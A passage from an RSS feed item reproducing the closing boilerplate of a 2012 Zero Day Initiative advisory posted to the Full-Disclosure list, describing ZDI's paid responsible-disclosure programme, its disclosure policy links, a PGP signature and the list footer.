a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
     [<a href="http://twitter.com/thezdi"  rel="nofollow">twitter.com</a>]<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
wsBVAwUBUNRal1VtgMGTo1scAQIdiAf+N0Ri4mHa6zefY/tisSShB3G5ZWJ076cC<br />
hBUmPKnLfsbOtDfvk7rBn7Z8sM3aDeF3nTxFPd2bJcwMsG1udvjBhZ7nxEb6nKpi<br />
7iqzb0rqw0oKagzYSScM9JPd6SRTgcf8koS0MQZ3j4QoPAsoy/u9KfadXoa2agY/<br />
f8CQ9KMtimUU4cJJM/VUNWmmgBY9Lv8Ju1DzrTpUwp7zXSsHDFcU11p9ImAunSTL<br />
Of1Be64loCpkj71OtkOVjkIyoa1EqCM2buol5tzx4VrkfSMnn/s8iregl8p2QRAY<br />
KYPf07uIrBrf83LbzKuUcQ1ar+4dHYBhamOQXl1DVjs7WF1wl+JYmQ==<br />
=imrZ<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>ZDI Disclosures</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 20:56:34 +0800</pubDate>
        </item>
    </channel>
</rss>
